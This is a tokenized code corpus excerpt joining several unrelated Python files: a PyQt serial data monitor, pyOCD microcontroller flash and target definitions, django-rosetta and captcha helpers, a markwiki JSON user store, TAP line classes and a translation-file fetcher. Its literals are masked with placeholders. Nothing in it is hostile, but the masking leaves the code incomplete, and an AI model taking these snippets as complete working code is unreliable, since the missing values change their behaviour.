slot = self . on_select_port , tip = "<STR_LIT>" ) <EOL> self . start_action = self . create_action ( "<STR_LIT>" , <EOL> shortcut = "<STR_LIT>" , slot = self . OnStart , tip = "<STR_LIT>" ) <EOL> self . stop_action = self . create_action ( "<STR_LIT>" , <EOL> shortcut = "<STR_LIT>" , slot = self . OnStop , tip = "<STR_LIT>" ) <EOL> exit_action = self . create_action ( "<STR_LIT>" , slot = self . close , <EOL> shortcut = "<STR_LIT>" , tip = "<STR_LIT>" ) <EOL> self . start_action . setEnabled ( False ) <EOL> self . stop_action . setEnabled ( False ) <EOL> self . add_actions ( self . file_menu , <EOL> ( selectport_action , self . 
start_action , self . stop_action , <EOL> None , exit_action ) ) <EOL> self . help_menu = self . menuBar ( ) . addMenu ( "<STR_LIT>" ) <EOL> about_action = self . create_action ( "<STR_LIT>" , <EOL> shortcut = '<STR_LIT>' , slot = self . on_about , <EOL> tip = '<STR_LIT>' ) <EOL> self . add_actions ( self . help_menu , ( about_action , ) ) <EOL> def set_actions_enable_state ( self ) : <EOL> if self . portname . text ( ) == '<STR_LIT>' : <EOL> start_enable = stop_enable = False <EOL> else : <EOL> start_enable = not self . monitor_active <EOL> stop_enable = self . monitor_active <EOL> self . start_action . setEnabled ( start_enable ) <EOL> self . stop_action . setEnabled ( stop_enable ) <EOL> def on_about ( self ) : <EOL> msg = __doc__ <EOL> QMessageBox . about ( self , "<STR_LIT>" , msg . strip ( ) ) <EOL> def on_select_port ( self ) : <EOL> ports = enumerate_serial_ports ( ) <EOL> if len ( ports ) == <NUM_LIT:0> : <EOL> QMessageBox . critical ( self , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> return <EOL> item , ok = QInputDialog . getItem ( self , '<STR_LIT>' , <EOL> '<STR_LIT>' , ports , <NUM_LIT:0> , False ) <EOL> if ok and not item . isEmpty ( ) : <EOL> self . portname . setText ( item ) <EOL> self . set_actions_enable_state ( ) <EOL> def fill_ports_combobox ( self ) : <EOL> """<STR_LIT>""" <EOL> vNbCombo = "<STR_LIT>" <EOL> self . Com_ComboBox . clear ( ) <EOL> self . AvailablePorts = enumerate_serial_ports ( ) <EOL> for value in self . AvailablePorts : <EOL> self . Com_ComboBox . addItem ( value ) <EOL> vNbCombo += value + "<STR_LIT>" <EOL> vNbCombo = vNbCombo [ : - <NUM_LIT:3> ] <EOL> debug ( ( "<STR_LIT>" % ( vNbCombo ) ) ) <EOL> def OnStart ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . radio19200 . isChecked ( ) : <EOL> self . baudrate = <NUM_LIT> <EOL> print "<STR_LIT>" <EOL> if self . radio9600 . isChecked ( ) : <EOL> self . baudrate = <NUM_LIT> <EOL> print "<STR_LIT>" <EOL> vNbCombo = self . Com_ComboBox . currentIndex ( ) <EOL> self . port = self . 
AvailablePorts [ vNbCombo ] <EOL> self . button_Connect . setEnabled ( False ) <EOL> self . button_Disconnect . setEnabled ( True ) <EOL> self . Com_ComboBox . setEnabled ( False ) <EOL> self . data_q = Queue . Queue ( ) <EOL> self . error_q = Queue . Queue ( ) <EOL> self . com_monitor = ComMonitorThread ( <EOL> self . data_q , <EOL> self . error_q , <EOL> self . port , <EOL> self . baudrate ) <EOL> self . com_monitor . start ( ) <EOL> com_error = get_item_from_queue ( self . error_q ) <EOL> if com_error is not None : <EOL> QMessageBox . critical ( self , '<STR_LIT>' , <EOL> com_error ) <EOL> self . com_monitor = None <EOL> self . monitor_active = True <EOL> self . connect ( self . timer , SIGNAL ( '<STR_LIT>' ) , self . on_timer ) <EOL> update_freq = self . updatespeed_knob . value ( ) <EOL> if update_freq > <NUM_LIT:0> : <EOL> self . timer . start ( <NUM_LIT> / update_freq ) <EOL> self . status_text . setText ( '<STR_LIT>' ) <EOL> debug ( '<STR_LIT>' ) <EOL> def OnStop ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . com_monitor is not None : <EOL> self . com_monitor . join ( <NUM_LIT:1000> ) <EOL> self . com_monitor = None <EOL> self . monitor_active = False <EOL> self . button_Connect . setEnabled ( True ) <EOL> self . button_Disconnect . setEnabled ( False ) <EOL> self . Com_ComboBox . setEnabled ( True ) <EOL> self . timer . stop ( ) <EOL> self . status_text . setText ( '<STR_LIT>' ) <EOL> debug ( '<STR_LIT>' ) <EOL> def on_timer ( self ) : <EOL> """<STR_LIT>""" <EOL> self . read_serial_data ( ) <EOL> self . update_monitor ( ) <EOL> def on_knob_change ( self ) : <EOL> """<STR_LIT>""" <EOL> update_freq = self . updatespeed_knob . value ( ) <EOL> self . knob_l . setText ( '<STR_LIT>' % self . updatespeed_knob . value ( ) ) <EOL> if self . timer . isActive ( ) : <EOL> update_freq = max ( <NUM_LIT> , update_freq ) <EOL> self . timer . setInterval ( <NUM_LIT> / update_freq ) <EOL> def update_monitor ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . livefeed . 
has_new_data : <EOL> data = self . livefeed . read_data ( ) <EOL> self . csvdata . append ( [ data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ] ) <EOL> if len ( self . csvdata ) > self . max_spin . value ( ) : <EOL> f = open ( time . strftime ( "<STR_LIT>" ) + "<STR_LIT>" , '<STR_LIT>' ) <EOL> try : <EOL> writer = csv . writer ( f ) <EOL> for i in range ( self . max_spin . value ( ) ) : <EOL> writer . writerow ( self . csvdata [ i ] ) <EOL> print '<STR_LIT>' <EOL> finally : <EOL> f . close ( ) <EOL> self . csvdata = [ ] <EOL> self . g_samples [ <NUM_LIT:0> ] . append ( <EOL> ( data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ) ) <EOL> if len ( self . g_samples [ <NUM_LIT:0> ] ) > <NUM_LIT:100> : <EOL> self . g_samples [ <NUM_LIT:0> ] . pop ( <NUM_LIT:0> ) <EOL> self . g_samples [ <NUM_LIT:1> ] . append ( <EOL> ( data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ) ) <EOL> if len ( self . g_samples [ <NUM_LIT:1> ] ) > <NUM_LIT:100> : <EOL> self . g_samples [ <NUM_LIT:1> ] . pop ( <NUM_LIT:0> ) <EOL> self . g_samples [ <NUM_LIT:2> ] . append ( <EOL> ( data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ) ) <EOL> if len ( self . g_samples [ <NUM_LIT:2> ] ) > <NUM_LIT:100> : <EOL> self . g_samples [ <NUM_LIT:2> ] . pop ( <NUM_LIT:0> ) <EOL> tdata = [ s [ <NUM_LIT:0> ] for s in self . g_samples [ <NUM_LIT:2> ] ] <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> data [ i ] = [ s [ <NUM_LIT:1> ] for s in self . g_samples [ i ] ] <EOL> if self . gcurveOn [ i ] : <EOL> self . curve [ i ] . setData ( tdata , data [ i ] ) <EOL> """<STR_LIT>""" <EOL> self . plot . setAxisScale ( Qwt . QwtPlot . xBottom , tdata [ <NUM_LIT:0> ] , max ( <NUM_LIT:5> , tdata [ - <NUM_LIT:1> ] ) ) <EOL> self . plot . replot ( ) <EOL> def read_serial_data ( self ) : <EOL> """<STR_LIT>""" <EOL> qdata = list ( get_all_from_queue ( self . 
data_q ) ) <EOL> if len ( qdata ) > <NUM_LIT:0> : <EOL> data = dict ( timestamp = qdata [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] , <EOL> gx = qdata [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <EOL> gy = qdata [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <EOL> gz = qdata [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] <EOL> ) <EOL> self . livefeed . add_data ( data ) <EOL> def add_actions ( self , target , actions ) : <EOL> for action in actions : <EOL> if action is None : <EOL> target . addSeparator ( ) <EOL> else : <EOL> target . addAction ( action ) <EOL> def create_action ( self , text , slot = None , shortcut = None , <EOL> icon = None , tip = None , checkable = False , <EOL> signal = "<STR_LIT>" ) : <EOL> action = QAction ( text , self ) <EOL> if icon is not None : <EOL> action . setIcon ( QIcon ( "<STR_LIT>" % icon ) ) <EOL> if shortcut is not None : <EOL> action . setShortcut ( shortcut ) <EOL> if tip is not None : <EOL> action . setToolTip ( tip ) <EOL> action . setStatusTip ( tip ) <EOL> if slot is not None : <EOL> self . connect ( action , SIGNAL ( signal ) , slot ) <EOL> if checkable : <EOL> action . setCheckable ( True ) <EOL> return action <EOL> def main ( ) : <EOL> app = QApplication ( sys . argv ) <EOL> form = PlottingDataMonitor ( ) <EOL> form . show ( ) <EOL> app . exec_ ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from flash import Flash <EOL> flash_algo = { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> <EOL> ] , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : False <EOL> } ; <EOL> class Flash_lpc11u24 ( Flash ) : <EOL> def __init__ ( self , target ) : <EOL> super ( Flash_lpc11u24 , self ) . 
__init__ ( target , flash_algo ) <EOL> def programPage ( self , flashPtr , bytes ) : <EOL> write_size = <NUM_LIT> <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:4> ) : <EOL> data = bytes [ i * write_size : ( i + <NUM_LIT:1> ) * write_size ] <EOL> Flash . programPage ( self , flashPtr + i * write_size , data ) </s>
<s> """<STR_LIT>""" <EOL> import cortex_m <EOL> import target_kinetis <EOL> import target_kl02z <EOL> import target_kl05z <EOL> import target_kl25z <EOL> import target_kl26z <EOL> import target_kl28z <EOL> import target_kl46z <EOL> import target_k22f <EOL> import target_k64f <EOL> import target_k20d50m <EOL> import target_lpc800 <EOL> import target_lpc11u24 <EOL> import target_lpc1768 <EOL> import target_lpc4330 <EOL> import target_nrf51 <EOL> import target_nrf52 <EOL> import target_stm32f103rc <EOL> import target_stm32f051 <EOL> import target_maxwsnenv <EOL> import target_max32600mbed <EOL> import target_w7500 <EOL> import target_lpc11xx_32 <EOL> import target_lpc824 <EOL> import semihost <EOL> TARGET = { <EOL> '<STR_LIT>' : cortex_m . CortexM , <EOL> '<STR_LIT>' : target_kinetis . Kinetis , <EOL> '<STR_LIT>' : target_kl02z . KL02Z , <EOL> '<STR_LIT>' : target_kl05z . KL05Z , <EOL> '<STR_LIT>' : target_kl25z . KL25Z , <EOL> '<STR_LIT>' : target_kl26z . KL26Z , <EOL> '<STR_LIT>' : target_kl28z . KL28x , <EOL> '<STR_LIT>' : target_kl46z . KL46Z , <EOL> '<STR_LIT>' : target_k20d50m . K20D50M , <EOL> '<STR_LIT>' : target_k22f . K22F , <EOL> '<STR_LIT>' : target_k64f . K64F , <EOL> '<STR_LIT>' : target_lpc800 . LPC800 , <EOL> '<STR_LIT>' : target_lpc11u24 . LPC11U24 , <EOL> '<STR_LIT>' : target_lpc1768 . LPC1768 , <EOL> '<STR_LIT>' : target_lpc4330 . LPC4330 , <EOL> '<STR_LIT>' : target_nrf51 . NRF51 , <EOL> '<STR_LIT>' : target_nrf52 . NRF52 , <EOL> '<STR_LIT>' : target_stm32f103rc . STM32F103RC , <EOL> '<STR_LIT>' : target_stm32f051 . STM32F051 , <EOL> '<STR_LIT>' : target_maxwsnenv . MAXWSNENV , <EOL> '<STR_LIT>' : target_max32600mbed . MAX32600MBED , <EOL> '<STR_LIT>' : target_w7500 . W7500 , <EOL> '<STR_LIT>' : target_lpc11xx_32 . LPC11XX_32 , <EOL> '<STR_LIT>' : target_lpc824 . LPC824 , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> from cortex_m import CortexM <EOL> from . memory_map import ( FlashRegion , RamRegion , MemoryMap ) <EOL> import logging <EOL> DBGMCU_CR = <NUM_LIT> <EOL> DBGMCU_VAL = <NUM_LIT> <EOL> class STM32F103RC ( CortexM ) : <EOL> memoryMap = MemoryMap ( <EOL> FlashRegion ( start = <NUM_LIT> , length = <NUM_LIT> , blocksize = <NUM_LIT> , isBootMemory = True ) , <EOL> RamRegion ( start = <NUM_LIT> , length = <NUM_LIT> ) <EOL> ) <EOL> def __init__ ( self , link ) : <EOL> super ( STM32F103RC , self ) . __init__ ( link , self . memoryMap ) <EOL> def init ( self ) : <EOL> logging . debug ( '<STR_LIT>' ) <EOL> CortexM . init ( self ) <EOL> self . writeMemory ( DBGMCU_CR , DBGMCU_VAL ) ; </s>
<s> from datetime import datetime <EOL> from django . conf import settings <EOL> from rosetta . conf import settings as rosetta_settings <EOL> import django <EOL> import os <EOL> import inspect <EOL> from django . apps import AppConfig <EOL> from django . apps import apps <EOL> from django . utils import timezone <EOL> try : <EOL> from django . core . cache import caches <EOL> cache = caches [ rosetta_settings . ROSETTA_CACHE_NAME ] <EOL> except ImportError : <EOL> from django . core . cache import get_cache <EOL> cache = get_cache ( rosetta_settings . ROSETTA_CACHE_NAME ) <EOL> def timestamp_with_timezone ( dt = None ) : <EOL> """<STR_LIT>""" <EOL> dt = dt or datetime . now ( ) <EOL> if timezone is None : <EOL> return dt . strftime ( '<STR_LIT>' ) <EOL> if not dt . tzinfo : <EOL> tz = timezone . get_current_timezone ( ) <EOL> if not tz : <EOL> tz = timezone . utc <EOL> dt = dt . replace ( tzinfo = timezone . get_current_timezone ( ) ) <EOL> return dt . strftime ( "<STR_LIT>" ) <EOL> def find_pos ( lang , project_apps = True , django_apps = False , third_party_apps = False ) : <EOL> """<STR_LIT>""" <EOL> paths = [ ] <EOL> parts = settings . SETTINGS_MODULE . split ( '<STR_LIT:.>' ) <EOL> project = __import__ ( parts [ <NUM_LIT:0> ] , { } , { } , [ ] ) <EOL> abs_project_path = os . path . normpath ( os . path . abspath ( os . path . dirname ( project . __file__ ) ) ) <EOL> if project_apps : <EOL> if os . path . exists ( os . path . abspath ( os . path . join ( os . path . dirname ( project . __file__ ) , '<STR_LIT>' ) ) ) : <EOL> paths . append ( os . path . abspath ( os . path . join ( os . path . dirname ( project . __file__ ) , '<STR_LIT>' ) ) ) <EOL> if os . path . exists ( os . path . abspath ( os . path . join ( os . path . dirname ( project . __file__ ) , '<STR_LIT:..>' , '<STR_LIT>' ) ) ) : <EOL> paths . append ( os . path . abspath ( os . path . join ( os . path . dirname ( project . 
__file__ ) , '<STR_LIT:..>' , '<STR_LIT>' ) ) ) <EOL> if django_apps : <EOL> django_paths = cache . get ( '<STR_LIT>' ) <EOL> if django_paths is None : <EOL> django_paths = [ ] <EOL> for root , dirnames , filename in os . walk ( os . path . abspath ( os . path . dirname ( django . __file__ ) ) ) : <EOL> if '<STR_LIT>' in dirnames : <EOL> django_paths . append ( os . path . join ( root , '<STR_LIT>' ) ) <EOL> continue <EOL> cache . set ( '<STR_LIT>' , django_paths , <NUM_LIT> * <NUM_LIT> ) <EOL> paths = paths + django_paths <EOL> for localepath in settings . LOCALE_PATHS : <EOL> if os . path . isdir ( localepath ) : <EOL> paths . append ( localepath ) <EOL> has_appconfig = False <EOL> for appname in settings . INSTALLED_APPS : <EOL> if rosetta_settings . EXCLUDED_APPLICATIONS and appname in rosetta_settings . EXCLUDED_APPLICATIONS : <EOL> continue <EOL> p = appname . rfind ( '<STR_LIT:.>' ) <EOL> if p >= <NUM_LIT:0> : <EOL> app = getattr ( __import__ ( appname [ : p ] , { } , { } , [ str ( appname [ p + <NUM_LIT:1> : ] ) ] ) , appname [ p + <NUM_LIT:1> : ] ) <EOL> else : <EOL> app = __import__ ( appname , { } , { } , [ ] ) <EOL> if django . VERSION [ <NUM_LIT:0> : <NUM_LIT:2> ] >= ( <NUM_LIT:1> , <NUM_LIT:7> ) : <EOL> if inspect . isclass ( app ) and issubclass ( app , AppConfig ) : <EOL> has_appconfig = True <EOL> continue <EOL> app_path = os . path . normpath ( os . path . abspath ( os . path . join ( os . path . dirname ( app . __file__ ) , '<STR_LIT>' ) ) ) <EOL> if '<STR_LIT>' in app_path and '<STR_LIT>' in app_path and not django_apps : <EOL> continue <EOL> if not third_party_apps and abs_project_path not in app_path : <EOL> continue <EOL> if not project_apps and abs_project_path in app_path : <EOL> continue <EOL> if os . path . isdir ( app_path ) : <EOL> paths . append ( app_path ) <EOL> if has_appconfig : <EOL> for app_ in apps . get_app_configs ( ) : <EOL> if rosetta_settings . EXCLUDED_APPLICATIONS and app_ . name in rosetta_settings . 
EXCLUDED_APPLICATIONS : <EOL> continue <EOL> app_path = app_ . path <EOL> if '<STR_LIT>' in app_path and '<STR_LIT>' in app_path and not django_apps : <EOL> continue <EOL> if not third_party_apps and abs_project_path not in app_path : <EOL> continue <EOL> if not project_apps and abs_project_path in app_path : <EOL> continue <EOL> if os . path . exists ( os . path . abspath ( os . path . join ( app_path , '<STR_LIT>' ) ) ) : <EOL> paths . append ( os . path . abspath ( os . path . join ( app_path , '<STR_LIT>' ) ) ) <EOL> if os . path . exists ( os . path . abspath ( os . path . join ( app_path , '<STR_LIT:..>' , '<STR_LIT>' ) ) ) : <EOL> paths . append ( os . path . abspath ( os . path . join ( app_path , '<STR_LIT:..>' , '<STR_LIT>' ) ) ) <EOL> ret = set ( ) <EOL> langs = [ lang , ] <EOL> if u'<STR_LIT:->' in lang : <EOL> _l , _c = map ( lambda x : x . lower ( ) , lang . split ( u'<STR_LIT:->' , <NUM_LIT:1> ) ) <EOL> langs += [ u'<STR_LIT>' % ( _l , _c ) , u'<STR_LIT>' % ( _l , _c . upper ( ) ) , u'<STR_LIT>' % ( _l , _c . capitalize ( ) ) , ] <EOL> elif u'<STR_LIT:_>' in lang : <EOL> _l , _c = map ( lambda x : x . lower ( ) , lang . split ( u'<STR_LIT:_>' , <NUM_LIT:1> ) ) <EOL> langs += [ u'<STR_LIT>' % ( _l , _c ) , u'<STR_LIT>' % ( _l , _c . upper ( ) ) , u'<STR_LIT>' % ( _l , _c . capitalize ( ) ) , ] <EOL> paths = map ( os . path . normpath , paths ) <EOL> paths = list ( set ( paths ) ) <EOL> for path in paths : <EOL> if path not in rosetta_settings . ROSETTA_EXCLUDED_PATHS : <EOL> for lang_ in langs : <EOL> dirname = os . path . join ( path , lang_ , '<STR_LIT>' ) <EOL> for fn in rosetta_settings . POFILENAMES : <EOL> filename = os . path . join ( dirname , fn ) <EOL> if os . path . isfile ( filename ) : <EOL> ret . add ( os . path . abspath ( filename ) ) <EOL> return list ( sorted ( ret ) ) <EOL> def pagination_range ( first , last , current ) : <EOL> r = [ ] <EOL> r . append ( first ) <EOL> if first + <NUM_LIT:1> < last : <EOL> r . 
append ( first + <NUM_LIT:1> ) <EOL> if current - <NUM_LIT:2> > first and current - <NUM_LIT:2> < last : <EOL> r . append ( current - <NUM_LIT:2> ) <EOL> if current - <NUM_LIT:1> > first and current - <NUM_LIT:1> < last : <EOL> r . append ( current - <NUM_LIT:1> ) <EOL> if current > first and current < last : <EOL> r . append ( current ) <EOL> if current + <NUM_LIT:1> < last and current + <NUM_LIT:1> > first : <EOL> r . append ( current + <NUM_LIT:1> ) <EOL> if current + <NUM_LIT:2> < last and current + <NUM_LIT:2> > first : <EOL> r . append ( current + <NUM_LIT:2> ) <EOL> if last - <NUM_LIT:1> > first : <EOL> r . append ( last - <NUM_LIT:1> ) <EOL> r . append ( last ) <EOL> r = list ( set ( r ) ) <EOL> r . sort ( ) <EOL> prev = <NUM_LIT> <EOL> for e in r [ : ] : <EOL> if prev + <NUM_LIT:1> < e : <EOL> try : <EOL> r . insert ( r . index ( e ) , '<STR_LIT>' ) <EOL> except ValueError : <EOL> pass <EOL> prev = e <EOL> return r </s>
<s> from django . conf . urls import url <EOL> from captcha import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , views . captcha_image , name = '<STR_LIT>' , kwargs = { '<STR_LIT>' : <NUM_LIT:1> } ) , <EOL> url ( r'<STR_LIT>' , views . captcha_image , name = '<STR_LIT>' , kwargs = { '<STR_LIT>' : <NUM_LIT:2> } ) , <EOL> url ( r'<STR_LIT>' , views . captcha_audio , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . captcha_refresh , name = '<STR_LIT>' ) , <EOL> ] </s>
import json
import hashlib
import os

from markwiki.exceptions import UserStorageError
from markwiki.models.user import User
from markwiki.storage.user import UserStorage


class FileUserStorage(UserStorage):
    '''Store user records as JSON files on disk, with two JSON index files
    mapping user id -> file path and email -> file path.'''

    def __init__(self, config):
        # Root directory for user files; the key read from config is masked
        # in this corpus -- presumably the wiki's data path (confirm).
        self._path = os.path.join(config['<STR_LIT>'], '<STR_LIT>')
        self._id_index_file = os.path.join(self._path, '<STR_LIT>')
        self._id_index = {}
        self._email_index_file = os.path.join(self._path, '<STR_LIT>')
        self._email_index = {}

    def initialize(self):
        '''Create the storage directory and empty indices on first run,
        otherwise load the existing indices from disk.'''
        if os.path.exists(self._path):
            self._read_indices()
        else:
            os.mkdir(self._path)
            self._write_json(self._id_index, self._id_index_file)
            self._write_json(self._email_index, self._email_index_file)

    def create(self, user):
        '''Persist a brand new user; raise UserStorageError on a name or
        email collision.'''
        user_file = self._get_user_file(user.name)
        if os.path.exists(user_file):
            raise UserStorageError('<STR_LIT>')
        if self.find_by_email(user.email) is not None:
            raise UserStorageError('<STR_LIT>')
        user.user_id = self._generate_user_id()
        self._write_json(user.__dict__, user_file)
        self._update_indices(user, user_file)

    def find_by_email(self, email):
        '''Return the User registered under ``email``, or None.'''
        user_file = self._email_index.get(email)
        if user_file is None:
            return None
        return self._load_user(user_file)

    def find_by_id(self, user_id):
        '''Return the User with the given id, or None.'''
        user_file = self._id_index.get(user_id)
        if user_file is None:
            return None
        return self._load_user(user_file)

    def find_by_name(self, name):
        '''Return the User with the given name, or None.'''
        return self._load_user(self._get_user_file(name))

    def update(self, user):
        '''Rewrite an existing user's JSON file in place.
        NOTE(review): the email index is not refreshed here, so changing a
        user's email would leave a stale index entry -- confirm intent.'''
        self._write_json(user.__dict__, self._get_user_file(user.name))

    def _generate_user_id(self):
        '''Pick the first unused numeric id at or above the index size.'''
        self._read_indices()
        candidate = len(self._id_index)
        while self.find_by_id(u'<STR_LIT>'.format(candidate)) is not None:
            candidate += 1
        return u'<STR_LIT>'.format(candidate)

    def _get_user_file(self, name):
        '''Map a user name to its on-disk path via an MD5 digest
        (used as a filename hash, not for security).'''
        hasher = hashlib.md5()
        hasher.update(name.encode('<STR_LIT:utf-8>'))
        return os.path.join(self._path, hasher.hexdigest())

    def _load_user(self, user_file):
        '''Deserialize a User from ``user_file``; None if it is missing.'''
        if not os.path.exists(user_file):
            return None
        with open(user_file, '<STR_LIT:r>') as fp:
            data = json.loads(fp.read())
        return User(data['<STR_LIT:name>'], data['<STR_LIT:email>'], data['<STR_LIT>'],
                    data['<STR_LIT>'], data['<STR_LIT>'])

    def _read_indices(self):
        '''Reload both indices from their JSON files.'''
        with open(self._id_index_file, '<STR_LIT:r>') as fp:
            self._id_index = json.loads(fp.read())
        with open(self._email_index_file, '<STR_LIT:r>') as fp:
            self._email_index = json.loads(fp.read())

    def _update_indices(self, user, user_file):
        '''Record the new user in the id index (always) and the email index
        (only when an email is set), flushing both to disk.'''
        self._id_index[user.user_id] = user_file
        self._write_json(self._id_index, self._id_index_file)
        if user.email:
            self._email_index[user.email] = user_file
            self._write_json(self._email_index, self._email_index_file)

    def _write_json(self, data, out):
        '''Serialize ``data`` to ``out`` as stable, pretty-printed JSON.'''
        payload = json.dumps(data, sort_keys=True, indent=2,
                             separators=('<STR_LIT:U+002C>', '<STR_LIT>'))
        with open(out, '<STR_LIT:w>') as fp:
            fp.write(payload)
class Line(object):
    """Abstract base for one parsed line of TAP output."""

    @property
    def category(self):
        raise NotImplementedError


class Result(Line):
    """A single test result line (ok / not ok)."""

    def __init__(self, ok, number=None, description='<STR_LIT>',
                 directive=None, diagnostics=None):
        self._ok = ok
        # A falsy number (None, '', 0) is normalized to None.
        self._number = int(number) if number else None
        self._description = description
        self.directive = directive
        self.diagnostics = diagnostics

    @property
    def category(self):
        """Category label for result lines."""
        return '<STR_LIT:test>'

    @property
    def ok(self):
        """Whether the test passed."""
        return self._ok

    @property
    def number(self):
        """The test number, or None when the line carried none."""
        return self._number

    @property
    def description(self):
        """Free-text description of the test."""
        return self._description

    @property
    def skip(self):
        """Delegate to the directive; requires a directive to be set."""
        return self.directive.skip

    @property
    def todo(self):
        """Delegate to the directive; requires a directive to be set."""
        return self.directive.todo

    def __str__(self):
        negation = '<STR_LIT>' if self.ok else '<STR_LIT>'
        directive_text = '<STR_LIT>'
        if self.directive is not None:
            directive_text = '<STR_LIT>'.format(self.directive.text)
        diagnostics_text = '<STR_LIT>'
        if self.diagnostics is not None:
            diagnostics_text = '<STR_LIT:\n>' + self.diagnostics.rstrip()
        return "<STR_LIT>".format(negation, self.number, self.description,
                                  directive_text, diagnostics_text)


class Plan(Line):
    """The plan line declaring how many tests are expected."""

    def __init__(self, expected_tests, directive=None):
        self._expected_tests = expected_tests
        self.directive = directive

    @property
    def category(self):
        """Category label for plan lines."""
        return '<STR_LIT>'

    @property
    def expected_tests(self):
        """Declared number of tests."""
        return self._expected_tests

    @property
    def skip(self):
        """Delegate to the directive; requires a directive to be set."""
        return self.directive.skip


class Diagnostic(Line):
    """A diagnostic (comment) line."""

    def __init__(self, text):
        self._text = text

    @property
    def category(self):
        """Category label for diagnostic lines."""
        return '<STR_LIT>'

    @property
    def text(self):
        """Raw diagnostic text."""
        return self._text


class Bail(Line):
    """A 'bail out' line aborting the run."""

    def __init__(self, reason):
        self._reason = reason

    @property
    def category(self):
        """Category label for bail lines."""
        return '<STR_LIT>'

    @property
    def reason(self):
        """Reason given for bailing out."""
        return self._reason


class Version(Line):
    """A TAP version declaration line."""

    def __init__(self, version):
        self._version = version

    @property
    def category(self):
        """Category label for version lines."""
        return '<STR_LIT:version>'

    @property
    def version(self):
        """Declared TAP version."""
        return self._version


class Unknown(Line):
    """Any line the parser did not recognize."""

    @property
    def category(self):
        """Category label for unrecognized lines."""
        return '<STR_LIT>'
from ConfigParser import ConfigParser, NoOptionError, NoSectionError
import os
import sys

import requests

API_URL = '<STR_LIT>'

LANGUAGES = [
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
]


def fetch_po_for(language, username, password):
    """Download one language's PO file from Transifex and write it into
    the locale tree.

    NOTE(review): relies on the module-global ``here`` set in the
    ``__main__`` block below -- calling this from an import would raise
    NameError; confirm before reusing.
    """
    # Parenthesized single-argument print: identical output on Python 2.
    print('<STR_LIT>'.format(language))
    po_api = '<STR_LIT>'.format(language)
    po_url = API_URL + po_api
    params = {'<STR_LIT:file>': '<STR_LIT:1>'}
    response = requests.get(po_url, auth=(username, password), params=params)
    if response.status_code == 200:
        response.encoding = '<STR_LIT:utf-8>'
        output_file = os.path.join(
            here, '<STR_LIT>', '<STR_LIT>', language, '<STR_LIT>', '<STR_LIT>')
        with open(output_file, '<STR_LIT:wb>') as out:
            out.write(response.text.encode('<STR_LIT:utf-8>'))
    else:
        print('<STR_LIT>'.format(language))


